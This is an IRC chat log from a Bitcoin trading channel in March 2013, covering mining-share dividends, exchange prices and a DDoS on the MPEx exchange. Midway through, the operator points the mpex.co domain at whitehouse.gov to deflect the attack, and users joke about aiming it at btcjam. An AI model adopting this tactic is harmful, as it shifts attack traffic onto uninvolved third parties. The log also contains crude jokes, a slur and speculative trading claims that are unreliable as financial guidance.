http://www.themoneyillusion.com/?p=19705&utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+Themoneyillusion+%28TheMoneyIllusion%29 Mar 06 23:21:13 so...how much did asicminer share pay per share? Mar 06 23:21:59 0.020 or something? Mar 06 23:22:05 .01916298 Mar 06 23:22:12 cool Mar 06 23:22:39 they sent it anyway, hadn't confirmed last I looked Mar 06 23:22:57 it confirmed Mar 06 23:23:02 the share count tx didn't yet Mar 06 23:23:30 oh wait, sorry, its only 4/6 atm Mar 06 23:23:34 its partially confirmed =P Mar 06 23:25:13 Lyspooner left him an oix. Mar 06 23:26:30 ? Mar 06 23:27:23 link you posted. Mar 06 23:28:53 to what end? he doesn't care about bitcoin so much as he just wants people who cry "bubble!" to be held to certain standards Mar 06 23:38:59 ;;estimate Mar 06 23:39:00 Next difficulty estimate | 4749889.19275 based on data since last change | 4913870.80684 based on data for last three days Mar 06 23:42:10 i daresay marketmaking for difficulty is less risky than one for price Mar 06 23:42:41 Lyspooner so i made a spurious comment on the interwebs. Mar 06 23:42:42 but the asics are still big unknowns Mar 06 23:42:52 jurov it's gotten to that point hasn't it. funny how things topple in btc. Mar 06 23:47:48 mircea_popescu: were you ddosed again? Mar 06 23:48:02 yeh Mar 06 23:48:21 didn't do much if anything at all this time. Mar 06 23:48:30 people must just not like you Mar 06 23:48:53 but girls love em Mar 06 23:48:59 mircea_popescu the jay z of btc Mar 06 23:49:10 can I produce your rap album? Mar 06 23:49:14 lol sure Mar 06 23:49:21 anyway, prolly kids getting their teeth cut. Mar 06 23:49:38 !ticker m ^OIX Mar 06 23:49:39 [MPEX:^OIX] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 29.08954763 / 47.63946252 / 49.7064472 (no shares, 17,893.87 BTC), 30D: 0 / 0 / 0 (0 shares, 0 BTC) Mar 06 23:49:46 nice Mar 06 23:49:53 OIX is a good metric Mar 06 23:50:05 im totally in love with it Mar 06 23:50:10 Your money is stored securely in the cloud (with 90% offline in secure storage), so if you lose your phone your money is still safe. Mar 06 23:50:12 after it said 47+ about a day early. Mar 06 23:50:16 http://blog.coinbase.com/post/44730207780/the-coinbase-android-app-has-launched Mar 06 23:50:32 jcpham remember the polish exchange that mtgox acquired in 2011 ? Mar 06 23:50:43 that btc is to this day securely in the cloud. Mar 06 23:50:50 does that mean option marketers are manipulating the price? Mar 06 23:50:53 bitomat.pl i think Mar 06 23:51:02 jcpham exactly, that's them. Mar 06 23:51:15 thestringpuller possibly that they draw from the same reservoir of future as the price does. Mar 06 23:51:23 ;;market sell 10000 Mar 06 23:51:28 A market order to sell 10000 bitcoins right now would net 428772.0536 USD and would take the last price down to 40.1000 USD, resulting in an average price of 42.8772 USD/BTC. | Data vintage: 0.0013 seconds Mar 06 23:51:32 Is it mer SAY uh po PESS coo? Mar 06 23:51:34 mircea_popescu: thats some oracle wisdom there Mar 06 23:51:57 hahaha Mar 06 23:52:20 AndroUser512 wow that made me lol in this huge meeting Mar 06 23:52:28 :) Mar 06 23:52:30 mirˈt͡ʃe̯a poˈpes.ku Mar 06 23:53:10 mircea_popescu are you at odds with bitinstant now? Mar 06 23:53:14 heh mircea rap album Mar 06 23:53:18 no ? Mar 06 23:53:22 also how the fuck did they get social engineered? Mar 06 23:54:01 ziggap is gonna surpass bitinstant at this rate Mar 06 23:54:16 [BTCTC] [S.MPOE-PT] 634 @ 0.00073 = 0.4628 BTC [+] Mar 06 23:54:26 Ziggap wad down earlier, still? Mar 06 23:54:29 Ukto: stop being lazy and have assbot announce BF Mar 06 23:54:37 For realz Mar 06 23:55:02 whoa is ziggap getting ddosed too? Mar 06 23:55:04 thestringpuller it is kinda funny, shrem gets owned, site is offline for three days, customers miss rally, popescu is ddosed nothing happens. Mar 06 23:55:18 i imagine it must be bruising egos but other than that... heh. who cares. Mar 06 23:55:29 well i was mad popescu! Mar 06 23:55:38 i couldnt get my oix from assbot Mar 06 23:55:45 unacceptable!!!! Mar 06 23:55:47 hehe ok Mar 06 23:56:06 http://www.torahinmotion.org/sites/default/files/50_asian_experiences_sheep.jpg Mar 06 23:56:09 mpex by design is built like a vault Mar 06 23:56:11 here, have a bunch of oix's for later Mar 06 23:56:22 Shoulda found a way to call it OINX Mar 06 23:56:30 someone would to assassinate popescu Mar 06 23:56:34 have to* Mar 06 23:56:34 MPOIX was in the list. Mar 06 23:56:46 I was expecting a much different picture Mar 06 23:56:51 in order to social engineer mpex Mar 06 23:56:53 peeps are working on it Mar 06 23:57:24 im assassinating myself Mar 06 23:57:27 death by chocolate. Mar 06 23:57:39 chocolate and pu$$y Mar 06 23:57:41 not by cuban cigars? Mar 06 23:57:51 cuban pussy is cheaper Mar 06 23:57:58 Yep ziggap still down Mar 06 23:58:04 everyone calm down and enjoy nice family photo: http://imgur.com/a4HcmCq Mar 06 23:58:04 mark cuban's mangina? Mar 06 23:58:24 iz siggap aethero's thing ? Mar 06 23:58:28 that ipo'd recently ? Mar 06 23:58:41 yeah Mar 06 23:58:42 Yes Mar 06 23:58:46 ahahahaah that's a slovak duck Mar 06 23:58:59 just a buy and sell service Mar 06 23:59:11 well not even sell, just buy Mar 06 23:59:12 no it's romanian. we don't use children. Mar 06 23:59:14 He says it means wallet in vietnamese or sumth Mar 06 23:59:27 north korean or something Mar 06 23:59:33 jurov only because couldn't figure out how to make any :D Mar 06 23:59:46 so why is it down ? Mar 06 23:59:59 teh hax0rs? Mar 07 00:00:05 sucks. Mar 07 00:00:09 Haven't seen aethero today to ask Mar 07 00:00:18 i see nothing untoward on frontpage Mar 07 00:00:30 alot of people were asking were you were about 8 hours ago mircea Mar 07 00:00:36 told them you got kidnapped by the CIA again Mar 07 00:01:06 cia party & barhopping special unit Mar 07 00:02:17 poor smickles,just came after 3wks and immediately had to calm the situation Mar 07 00:02:50 [BTCTC] [S.DICE-PT] 500 @ 0.00549 = 2.745 BTC [+] Mar 07 00:03:04 it was funny, cause when he went the other ddos was recent Mar 07 00:03:09 sorta like a bridge in tiem for him Mar 07 00:05:11 oh god. Mar 07 00:05:16 glbse drama still aint over Mar 07 00:05:41 where? Mar 07 00:05:59 necessarily on the forum Mar 07 00:06:05 naaa Mar 07 00:07:17 http://pastebin.com/XU3Wf9gu Mar 07 00:08:26 glbse drama fo life Mar 07 00:09:29 lol so our friendly ddosers actually wiped the upstream provider. Mar 07 00:10:10 NOW mpex is offline. Mar 07 00:10:25 indeed Mar 07 00:11:01 i guess never scorn a script kiddie. Mar 07 00:11:19 hell hath no fury like a script kiddie scorned Mar 07 00:12:10 anyway. should be resolved momentarily. Mar 07 00:12:16 the worst case scenario is we move over to tor. Mar 07 00:12:28 that'd likely be a coupla days of downtime. Mar 07 00:12:37 in between these extremes a number of intermediate solutions. Mar 07 00:13:03 Heaven has no rage like love to hatred turned, Nor hell a fury like a script kiddie scorned Mar 07 00:13:17 so the proxy idea doesnt work after all Mar 07 00:13:36 kakobrekla well anything on the internet is limited by the internet actually existing. Mar 07 00:14:06 it is? Mar 07 00:14:09 dear god Mar 07 00:14:42 mircea_popescu can't the engine just get moved to completely different dc? Mar 07 00:14:48 jurov yes, it could. Mar 07 00:15:01 but i dislike this sort of solutions, just hop around dcs ? Mar 07 00:15:10 what if i need to take a piss one day ? Mar 07 00:15:19 and only proxies would know where.. as long as it stays secret, no hoppin necessary Mar 07 00:15:43 this is a small scale garden variety tor implementation. Mar 07 00:15:55 tor sux Mar 07 00:15:58 why ? Mar 07 00:16:00 Uncertainty and expectation are the joys of life. Security is an insipid thing. Mar 07 00:16:17 Lyspooner shush you, you're not the one with the suspended exchange. Mar 07 00:16:34 that's not me, that's william congreve Mar 07 00:16:48 tor is not friendly Mar 07 00:16:57 for whom? Mar 07 00:17:01 to ME Mar 07 00:17:11 kakobrekla mpex would be on tor, proxies would be on normal web. Mar 07 00:17:24 problem is it's slow Mar 07 00:17:39 what the point then Mar 07 00:17:55 if proxies hide location Mar 07 00:17:59 well look, ddos mitigation is an exercise in moving upstream. Mar 07 00:18:12 what i had here was enough to make 10-100 Gb attacks ineffectual. Mar 07 00:18:37 someone taking down all tor nodes is a coupla degrees of magnitude over that. Mar 07 00:19:23 ya but they still know your current location Mar 07 00:19:34 and you need to change that Mar 07 00:19:47 if they are fuckin your isp Mar 07 00:19:51 or what Mar 07 00:20:00 half of gnax atlanta is dark atm. Mar 07 00:20:16 and if you change it to unknown its same shit if you keep it hidden via tor or via decent http proxies Mar 07 00:20:44 kakobrekla not really, you can actually trace to source with http proxies. Mar 07 00:21:03 may take a week or two, sure. Mar 07 00:21:42 eh? Mar 07 00:21:53 if they cant take tpb down with a solution like that Mar 07 00:21:59 they cant take you down Mar 07 00:22:35 possibly. Mar 07 00:23:03 http://www.reddit.com/r/Bitcoin/comments/19s3jh/dear_coinbase_please_order_some_more_coins_asap/ Mar 07 00:23:15 "If Coinbase borrowed inventory off btcjam (as btcquick does) they'd probably fund pretty quickly and have a better cost basis" Mar 07 00:23:22 the internet is full of idiots today Mar 07 00:23:25 i give up Mar 07 00:23:31 lol Mar 07 00:23:50 so the btcjam coins are being sold, eh Mar 07 00:23:51 good idea Mar 07 00:24:03 this idea is familiar Mar 07 00:24:22 mpex should lend out 100btc on btcjam and never see any of teh btc again Mar 07 00:24:23 do we know where the bticointalk coins ended up? Mar 07 00:24:36 btw Mar 07 00:24:40 selling borrowed coins was tried a few times at least once already Mar 07 00:24:49 none of the borrowed coins were returned afaik Mar 07 00:24:58 lmao Mar 07 00:25:08 btcjam should be ddosed Mar 07 00:25:15 piece of shit site/service Mar 07 00:25:19 point mpex dns to them Mar 07 00:25:25 lmao ahaghaha Mar 07 00:25:25 apparently they are more liquid that coinbase Mar 07 00:25:28 which boggles me Mar 07 00:25:51 demented animals that invent this crap Mar 07 00:25:56 so apparently reddit can't find btc Mar 07 00:26:01 and gox orders are stacking up Mar 07 00:26:22 all the bitcoins are gone! Mar 07 00:26:28 kakobrekla: that's a one out of the rg playbook :) Mar 07 00:26:30 coinlab will roll out its instawallet clone Mar 07 00:26:42 powered by SEC Mar 07 00:26:52 maybe coinlab should roll out a lending service Mar 07 00:26:53 Tom Williams Mar 07 00:26:58 those work great for liquidity Mar 07 00:27:21 ooh ooh iknow Mar 07 00:27:25 coinlab is gonna bring bitcoin to wallstreet man Mar 07 00:27:28 they could pay interest on deposits Mar 07 00:27:29 stop giving coinlab ideas Mar 07 00:27:32 jesus Mar 07 00:27:49 next you'll be telling them how to offer insurance Mar 07 00:27:51 fuck ya Mar 07 00:27:57 they could pay interest on deposits and then use those deposited coins to sell Mar 07 00:28:00 ooh and they should offer coin storage Mar 07 00:28:12 NO PIGEON Mar 07 00:28:24 ooh maybe even a mixer Mar 07 00:28:26 and a gpu farm integrated into independent video games Mar 07 00:28:26 for MAX ANON Mar 07 00:28:29 they're already cutting into BitHub's market share Mar 07 00:28:32 ooh yeah that too Mar 07 00:28:55 all ur gamerz r teh goldz Mar 07 00:29:02 just wait until one of these guys starts offering interest on deposits Mar 07 00:29:12 7% a week Mar 07 00:29:12 like 7% a week. Mar 07 00:29:16 ;) Mar 07 00:29:17 first. Mar 07 00:29:18 you mean like divs? Mar 07 00:29:20 yeah exactly like 7% a week Mar 07 00:29:26 what a mind blowing concept Mar 07 00:30:01 it will be a revolutionary concept to the internet at large Mar 07 00:30:12 i thought 7% a week must be a scam, BUT YCOMBINATOR! Mar 07 00:30:16 heh, mtgoxlive loaded for me first time today Mar 07 00:30:19 exactly Mar 07 00:30:26 buy ycombinator Mar 07 00:30:42 *but Mar 07 00:30:45 not buy Mar 07 00:31:08 why ask why? Mar 07 00:31:27 deflationary currency. with 7% weekly interest. austrian economists, take that. Mar 07 00:31:37 better than perpetuum mobile Mar 07 00:31:47 well we are still at 25 btc/block inflation Mar 07 00:31:59 -I don't know where coinbase buys. All I'm saying is that they're out and have been for a couple of days. When they no longer say they're out. I think the price of BTC stabilizes. Maybe it's a leading indicator. Mar 07 00:32:12 newbs in -otc talking about coinbase out of money Mar 07 00:32:31 how can they be out of money? YCOMBINATOR Mar 07 00:32:40 because bitcoin. Mar 07 00:32:57 anyone named the source? Mar 07 00:33:10 try mpex.co nao Mar 07 00:33:10 nope Mar 07 00:33:10 what happened to mpex.co? Mar 07 00:33:27 OMG surely there are no alternative sites using twitter bootstrap that will buy bitcoins for us off an exchange for an extra fee Mar 07 00:33:37 I'm the source. not really a newb - in since 6.43 Mar 07 00:33:48 my bad Mar 07 00:34:04 just changed my name lots of times Mar 07 00:34:05 i'm totally a noob though Mar 07 00:34:11 btw, didn't anyone try to compare coinlab sales with pirate's loot? whether the amount isn't approximately similar, perchance Mar 07 00:34:16 why'd you wait till june, japan had gained a lot by then Mar 07 00:34:27 lol Mar 07 00:34:33 very patriotic Mar 07 00:34:56 jurov: how much did pirate actually make off with? i think it's unknown, b/c everyone won't fess up about how much they got paid back in interest Mar 07 00:35:04 it is unknown Mar 07 00:35:05 hey, people wanna show off their muscle, let them show it off to people who care. Mar 07 00:35:17 i doubt he had much left Mar 07 00:35:20 pigeons: same Mar 07 00:35:37 is that going to redirect the ddos to wh? Mar 07 00:35:41 no right? Mar 07 00:35:52 i imagine yes. Mar 07 00:36:01 mpex.co -> http://www.whitehouse.gov LMAO Mar 07 00:36:22 i figure i got a 1% shot of making us national news. Mar 07 00:36:26 heh Mar 07 00:36:36 its a very clever idea Mar 07 00:36:43 lol, that actually worked. Mar 07 00:37:03 WE GET SIGNAL Mar 07 00:37:05 mod6 what ?! Mar 07 00:37:10 don't tell me it's down Mar 07 00:37:21 redirect from mpex.co to whitehouse.gov Mar 07 00:37:24 a a Mar 07 00:37:25 yeah Mar 07 00:37:26 i luld Mar 07 00:37:37 and needed to subsequently quote zero-wing Mar 07 00:37:59 that's terrible mircea_popescu Mar 07 00:38:16 everyone, now try to submit post requests to whitehouse Mar 07 00:38:28 with gpg encrypted mpex stuff Mar 07 00:38:49 lol it has no hole Mar 07 00:39:08 not working Mar 07 00:39:10 mircea_popescu - I got STAT earlier today if you care. Mar 07 00:39:14 mpex.co down Mar 07 00:39:15 romainian bitterrorist pornagrapher points site at whitehouse to direct shadowy hackers to take down usa's "critical infrastructure" Mar 07 00:39:19 whitehouse.gov not down Mar 07 00:39:33 inb4 black helicopters Mar 07 00:39:49 lol i just got an actual proper page Mar 07 00:39:49 inb4 drone strike Mar 07 00:40:00 its back! Mar 07 00:40:13 30day Total Volume 133`707.57454204 BTC Mar 07 00:40:16 this look stale to anyone ? Mar 07 00:40:28 l33t Mar 07 00:40:59 im guffawing over here Mar 07 00:41:21 pointing pympex to whitehouse.gov got HTTP Error 403: Forbidden Mar 07 00:41:32 completely appropriate Mar 07 00:41:35 interesting Mar 07 00:42:20 250k btc I think was the popular rumour Mar 07 00:42:29 went as high as 500k Mar 07 00:43:19 http://mpex.coinbr.com/ back online Mar 07 00:43:20 So Henry Paulson is the new C.E.O of coinlab? Mar 07 00:43:35 jurov: nice Mar 07 00:44:00 well that worked. Mar 07 00:44:13 leson learned : when someone throws a quarter tb of crap at you Mar 07 00:44:17 His name was Robert Paulsen Mar 07 00:44:25 point to something white and get out of the way Mar 07 00:44:36 confirmed mpex.coinbr.com Mar 07 00:45:13 he's thinking of robert's sister, henry. Mar 07 00:45:26 ya Mar 07 00:46:27 This bothers me " Whether you are a savvy investor, Bitcoin merchant, or crypto-hobbiest, trading Bitcoin in the US and Canada is about to get faster, easier, and even more secure." Mar 07 00:46:40 lol Mar 07 00:46:46 "also, no coins" Mar 07 00:46:48 You have a misspelling in the first sentence of your splash page Mar 07 00:46:57 haha Mar 07 00:47:23 i shouldnt laugh at that, i misspell tons of words :/ Mar 07 00:47:26 Current Price 541m ago Mt. Gox sockets are down. Trade data will not update until they come back online, and depth data will only update once every 15 minutes. Sorry! Mar 07 00:47:30 from mpex.co front page "The time has come to fill important judicial vacancies" Mar 07 00:47:35 weird that all the other websites still work Mar 07 00:47:42 "Thanks to our partnerships with SEC, Taxoffice and the Whitehouse, we can now provide these services" Mar 07 00:47:55 wait Mar 07 00:48:01 mtgox got flumoxxed too ? Mar 07 00:48:17 mircea_popescu is jealous Mar 07 00:48:23 ;;goxlag Mar 07 00:48:24 0 seconds Mar 07 00:48:32 lmao ok ok Mar 07 00:48:34 ;;ticker Mar 07 00:48:35 BTCUSD ticker | Best bid: 45.90000, Best ask: 46.00000, Bid-ask spread: 0.10000, Last trade: 45.90000, 24 hour volume: 119925.05033138, 24 hour low: 40.01120, 24 hour high: 49.09900, 24 hour vwap: 45.19828 Mar 07 00:48:36 coinlab got flummoxed Mar 07 00:48:43 Ashton Kutcher’s A-Grade Investments joined with Ben Davenport and Trace Mayer in another round of seed founding for BitPay. Mar 07 00:48:59 thank christ for ashton kutcher Mar 07 00:49:02 ok, so with bitcoin roken, where is the bottom Mar 07 00:49:06 broken* Mar 07 00:49:07 lol BitHub Mar 07 00:49:31 Charlie Sheen bitcoin company will be better Mar 07 00:49:55 BitHub: you'll take that back once you find out he's just punking the btc community for a new MTV series Mar 07 00:50:11 mtv still exists ?! Mar 07 00:50:12 ahh so that's who's been trolling the price lately Mar 07 00:50:12 ^ iz may have a point Mar 07 00:50:29 if ashton gets to play satoshi ina bitcoin movie i'll be upset Mar 07 00:50:39 lulz jcpham Mar 07 00:50:45 holy shit Mar 07 00:51:20 Dude, where's my bitcoins? Mar 07 00:51:46 its gotta be ryan gosling Mar 07 00:51:47 mircea_popescu has a doctor evil suit Mar 07 00:52:01 tru dat. Mar 07 00:52:04 piefucker played a good satoshi Mar 07 00:52:06 dub: then all girls will want to go and see it Mar 07 00:52:26 would you guys ever fund a movie with bitcoins? Mar 07 00:52:43 sounds like an IPO Mar 07 00:52:55 [MPEX] [O.BTCUSD.C450T] 120 @ 0.22222082 = 26.6665 BTC [+] Mar 07 00:52:57 Richard Simmons as usagi Mar 07 00:53:05 LOL Mar 07 00:53:06 BitHub - girlsgonebitcoin does that all the time Mar 07 00:53:07 i think you should fund my movie Mar 07 00:53:07 haha Mar 07 00:53:32 BitHub i acrtually had some outfit in chicago to do me a short Mar 07 00:53:35 sadly they flaked out. Mar 07 00:53:42 i asked Ashton who is going to play Satoshi Mar 07 00:53:42 was last year. Mar 07 00:53:50 we'll see if he responds Mar 07 00:53:52 a short for what mircea? Mar 07 00:53:59 a short film. Mar 07 00:54:10 https://plus.google.com/115257212064017961354/posts/Pmd1sPVby5A Mar 07 00:54:11 yes Mar 07 00:54:16 with you acting in it? Mar 07 00:54:19 nah. Mar 07 00:54:35 you know the "are you the brain specialist" monthy python sketch ? Mar 07 00:54:41 nice jcpham Mar 07 00:54:43 probably Mar 07 00:54:51 so it was going to be a remake of that, except with the Mar 07 00:54:57 Are you the Bitcoin Financialist Mar 07 00:55:16 i was suppose to make a short film this year to take to Robert Rodriguez and troublemaker studios for their new television network EL REY Mar 07 00:55:17 would have been hysterical Mar 07 00:55:19 hey mircea you gonna have to switch the slogan nao https://bitcointalk.org/index.php?topic=101902.msg1592841#msg1592841 Mar 07 00:55:20 but doing this crap instead Mar 07 00:55:26 was just about the time the various idiots were popping post-pirate Mar 07 00:55:37 kakobrekla the only bitcoin service hacked by the white house ? Mar 07 00:55:49 smth like dat Mar 07 00:56:13 i dont know anything about ianbakeweall, but kinda weird to just say, "i suspect this guy is involved in the ddos" Mar 07 00:56:57 hah mircea i'm pretty intrested in making some bitcoin commercials Mar 07 00:57:21 also https://bitcointalk.org/index.php?topic=138956.msg1592861#msg1592861 Mar 07 00:57:23 i had this one idea of like a Mr. Satoshi montage Mar 07 00:57:25 get the sham-wow guy Mar 07 00:57:39 why do they say that guy would ddos mpex? Mar 07 00:59:40 bakewell mining Mar 07 00:59:50 he's been a lil off lately Mar 07 00:59:54 sold my shares Mar 07 01:00:32 he has a sock on his head Mar 07 01:00:33 got some jah ones instead better divs Mar 07 01:00:34 he called the S.DICE short pretty well Mar 07 01:00:37 what more do you need to know? Mar 07 01:00:47 great timing Mar 07 01:00:53 if he really did sell at .0062 Mar 07 01:01:02 instead of borrow at .0062 and not sell it in time Mar 07 01:01:03 well he still has to buy them back Mar 07 01:01:14 I didn't see a sale go off at .0062 of that size Mar 07 01:01:22 [BTCTC] [ASICMINER-PT] 32 @ 0.65 = 20.8 BTC [-] Mar 07 01:01:46 erhm... MPEx redirects to the whitehouse.gov website? lol... Mar 07 01:01:47 hm so acsic miner aint that hot all of a sudden? Mar 07 01:01:50 JAH shares atm are much better value to buy than AISCMINER and BAKEWELL Mar 07 01:01:54 asicminer-pt Mar 07 01:02:04 oh so the ddos comment was so that people couldnt buy up s.dice Mar 07 01:02:35 i dont get why you would buy asicminer shares where jah's are much better value and get roughly the same pay out div for alot cheaper Mar 07 01:02:53 does jah have asics? Mar 07 01:02:54 but asic right in the name! Mar 07 01:02:58 yep Mar 07 01:03:06 that's why may as well get jah Mar 07 01:03:16 he actually has avalons in his hands? Mar 07 01:03:18 BitHub: JAH has nowhere near the same potential tho... Mar 07 01:03:35 no avalons in his hands but his asicminer divs are kicking in Mar 07 01:03:36 Would go down while ASICMINER will go up in mined coins. Mar 07 01:03:42 so he has no asics Mar 07 01:04:03 dude Mar 07 01:04:07 hes got 2 on preorder Mar 07 01:04:12 DUDE Mar 07 01:04:18 2 on preorder = 0 asics Mar 07 01:04:20 PREORDER IS WORTHLESS Mar 07 01:04:28 PREORDER IS FUCKED Mar 07 01:04:39 wait Mar 07 01:05:00 80% chance of worthless Mar 07 01:05:03 i'm getting 0.00072538btc a share atm Mar 07 01:05:09 remember they guy runnning JAH is retarded Mar 07 01:05:14 daily Mar 07 01:05:15 kakobrekla lol @forum Mar 07 01:05:19 though that hasn't hurt dice Mar 07 01:05:47 Can I short JAH? Mar 07 01:05:56 "coming soon" Mar 07 01:06:01 short btc Mar 07 01:06:12 were seeign $2 this week Mar 07 01:06:19 Currently I'd be shorting almost anything. Mar 07 01:06:30 it was like .06 a few weeks ago hey Mar 07 01:06:51 Namworld just because of btc/usd ? Mar 07 01:07:04 now its hmmm 2.8? Mar 07 01:07:07 No... because those small mining ops don't look good. Mar 07 01:07:14 i mean 0.28 Mar 07 01:07:40 plus USD/BTC price just further promotes shorting Mar 07 01:07:48 [MPEX] [S.MPOE] 19250 @ 0.00072389 = 13.9349 BTC [+] Mar 07 01:07:49 how much is asicminer paying per share atm? Mar 07 01:07:49 [MPEX] [S.MPOE] 9076 @ 0.00073711 = 6.69 BTC [+] Mar 07 01:07:57 div wise Mar 07 01:08:01 [MPEX] [S.MPOE] 5247 @ 0.00074548 = 3.9115 BTC [+] Mar 07 01:08:03 [MPEX] [S.MPOE] 41427 @ 0.00074999 = 31.0698 BTC [+] Mar 07 01:08:32 How much Terahash is ASICMINER at now? Mar 07 01:08:43 o hey. "mpoe surges on news of failed ddos" Mar 07 01:08:48 6 or something? Mar 07 01:08:59 mircea_popescu: new of USG backing Mar 07 01:09:02 news* Mar 07 01:09:17 o that too ya Mar 07 01:09:32 "mpex the first bitcoin business to implement quantitative easing" Mar 07 01:10:06 [BTCTC] [COGNITIVE] 2 @ 0.262 = 0.524 BTC [-] Mar 07 01:10:08 [BTCTC] [COGNITIVE] 5 @ 0.2576 = 1.288 BTC [-] Mar 07 01:10:32 So, anyway Mar 07 01:10:41 [BTCTC] [COGNITIVE] 1 @ 0.255 BTC [-] Mar 07 01:11:40 ;;ticker Mar 07 01:11:41 BTCUSD ticker | Best bid: 45.01002, Best ask: 45.05000, Bid-ask spread: 0.03998, Last trade: 45.05000, 24 hour volume: 120957.15085783, 24 hour low: 40.01120, 24 hour high: 49.09900, 24 hour vwap: 45.23178 Mar 07 01:11:44 in case anyone doesn't know what http://www.bloomberg.com/news/2013-03-05/merkel-looks-east-for-austerity-allies-in-talks-with-hollande.html is all about : Mar 07 01:11:58 holland was forever trying to block romania's access to schengen zone Mar 07 01:12:02 germany joined them recently Mar 07 01:12:12 bucharest shocked them by going fu, we don't want in anymore. Mar 07 01:12:16 Who has mining stocks to lend me? As always I have lots of backings available and good borrowing habits. Mar 07 01:12:19 merkel is now backpedalling. Mar 07 01:12:23 bucharest 1 : berlin 0. Mar 07 01:13:45 mircea_popescu: probably a really good call. Mar 07 01:14:10 the eurozone will be the zone of misery once this thing starts to unwravel faster than it already is. Mar 07 01:15:15 and no one in their right mind would want to lose soverignty to some EU technocrat Mar 07 01:15:36 btc ftw Mar 07 01:15:39 yeah Mar 07 01:15:47 Namworld what sort of stocks? Mar 07 01:16:02 which mining stocks Mar 07 01:16:16 Pretty much anything that is not ASICMINER Mar 07 01:16:42 i got some jah Mar 07 01:16:53 i had some bakewell but got rid of them and got some jah Mar 07 01:17:06 Any signigicant amount? Mar 07 01:17:20 first you got baked well now you have rasta jah. in style. Mar 07 01:17:35 nice kako Mar 07 01:17:43 [MPEX] [O.BTCUSD.P490T] 750 @ 0.28155951 = 211.1696 BTC [-] Mar 07 01:17:53 maybe about 20 to play with nam? Mar 07 01:18:02 rest i'm holding Mar 07 01:18:13 eh, not enough for me. Mar 07 01:18:34 How many do you have total and how long were you planning to hold them? Mar 07 01:18:50 finally call to miners to increase blocksize: https://bitcointalk.org/index.php?topic=149668.0 Mar 07 01:19:03 lol kakobrekla http://pastebin.com/XU3Wf9gu Mar 07 01:19:22 what Mar 07 01:19:32 jurov hearn is a muppet. Mar 07 01:19:43 kakobrekla i enjoyed the reply. Mar 07 01:19:47 :p Mar 07 01:20:23 I'll just PM you Mar 07 01:22:36 [BTCTC] [BASIC-MINING] 4 @ 0.33317 = 1.3327 BTC [-] Mar 07 01:23:13 [BTCTC] [ASICMINER-PT] 2 @ 0.65 = 1.3 BTC [-] Mar 07 01:23:30 o wait, puts trading ? Mar 07 01:23:31 that's new. Mar 07 01:23:44 philly time Mar 07 01:24:19 think peeps realizing, overpricing on asicminer Mar 07 01:24:24 at teh moment Mar 07 01:24:54 94btc tx fee wat Mar 07 01:25:25 http://blockchain.info/tx/13dffdaef097881acfe9bdb5e6338192242d80161ffec264ee61cf23bc9a1164 Mar 07 01:25:28 anyway, everyone got their mpex/wh screencaps etc ? Mar 07 01:26:00 http://mpex.co hope no one was using them! Mar 07 01:26:00 The White House Mar 07 01:26:13 made me lulz Mar 07 01:26:17 HEH Mar 07 01:26:33 pretty good depth on the ask side now... (looking at bitcoincharts.com) Mar 07 01:26:45 yes juding by the traffic, noone was using them. duh! Mar 07 01:26:58 judging Mar 07 01:27:21 hahha peeps are taking this seriously Mar 07 01:27:23 was afraid of that. Mar 07 01:27:34 dub badly composed tx ? (insufficient outputs) Mar 07 01:27:36 they think mircea has becomea CIA snitch Mar 07 01:27:37 ah lone != line Mar 07 01:27:38 my bad Mar 07 01:27:39 lul! Mar 07 01:28:13 heh this is probably a huge PR for mp Mar 07 01:28:24 time to contact cnn news Mar 07 01:28:33 I called da top Mar 07 01:28:36 mircea_popescu: nobody knows Mar 07 01:28:39 troll it a lil further Mar 07 01:29:50 if you want to uber troll stick up an ICE takedown Mar 07 01:30:07 dub sadly i was going to do that april 1st Mar 07 01:30:13 but now it's lost all its cache ;/ Mar 07 01:30:18 cachet* Mar 07 01:30:18 Bugpowder if that's you, you called the top every 10 minutes for two months straight Mar 07 01:30:22 mpex.co is .. wtf Mar 07 01:30:34 did usg just sieze it? Mar 07 01:30:50 dude Mar 07 01:31:00 yeah its been seized Mar 07 01:31:02 lol Mar 07 01:31:05 yeah Mar 07 01:31:09 run!!! Mar 07 01:31:13 you should redirect to an FBI 'seized domain' page Mar 07 01:31:15 mpex and bitcion protocol hacked at the same time Mar 07 01:31:16 well, mpex.co still goes to wh.gov so *shrug* Mar 07 01:31:16 did you have shares there? Mar 07 01:31:18 if you really want to troll Mar 07 01:31:20 probably time to panic Mar 07 01:31:22 yeah do it mircea Mar 07 01:31:22 huh Mar 07 01:31:26 lol Mar 07 01:31:26 huge PR Mar 07 01:31:33 could this be causing the fall in BTC prices? Mar 07 01:31:35 people will be like WTF MPEX? Mar 07 01:31:42 ;;ticker Mar 07 01:31:43 AskReddit Mar 07 01:31:44 BTCUSD ticker | Best bid: 44.30000, Best ask: 44.40000, Bid-ask spread: 0.10000, Last trade: 44.40000, 24 hour volume: 121935.01959325, 24 hour low: 40.01120, 24 hour high: 49.09900, 24 hour vwap: 45.24020 Mar 07 01:31:49 holy shit Mar 07 01:31:49 Bugpowder_: probably the block size issue Mar 07 01:31:51 we are crashing Mar 07 01:31:52 making a reddit post now Mar 07 01:31:57 Bugpowder_: /sprobably/hopefully Mar 07 01:31:58 doctor_pullfingr flush your dns Mar 07 01:32:10 oh no, we have lost a few hours of gains Mar 07 01:32:12 single digits Mar 07 01:32:17 I still need to take a pic of the Kruggerand vs 25BTC Casascius coin Mar 07 01:32:20 $2 Mar 07 01:32:26 would have been better at $49 Mar 07 01:32:34 than at 44 and falling Mar 07 01:32:36 what was the news? Mar 07 01:32:45 bitcoin is broken Mar 07 01:32:47 tweeting fox news now mircea Mar 07 01:32:47 I sold Mar 07 01:32:49 mircea - why? are you pointing to girlsgonebitcoin now? Mar 07 01:32:49 is something happening aside from the block size problem Mar 07 01:32:54 lol Mar 07 01:33:04 tweeting all the news networks Mar 07 01:33:05 ineededausername not rly. Mar 07 01:33:14 ineededausername: I think its the $12 price rise in 36hours Mar 07 01:33:17 oh lol Mar 07 01:33:21 that is NOT sustainable Mar 07 01:33:31 Sequester shut down MPEX Mar 07 01:33:33 i feel bad now Mar 07 01:33:38 yeah I'd be happy about a crash to $25 Mar 07 01:33:52 I expect a lot of people watching their transactiosn not going through Mar 07 01:33:53 because that would make me feel confident about the price again Mar 07 01:34:07 seeing the devs begging miners to fix it Mar 07 01:34:24 i don't feel confident in mpex its been seized Mar 07 01:34:40 http://i.telegraph.co.uk/multimedia/archive/01980/markets_1980043c.jpg Mar 07 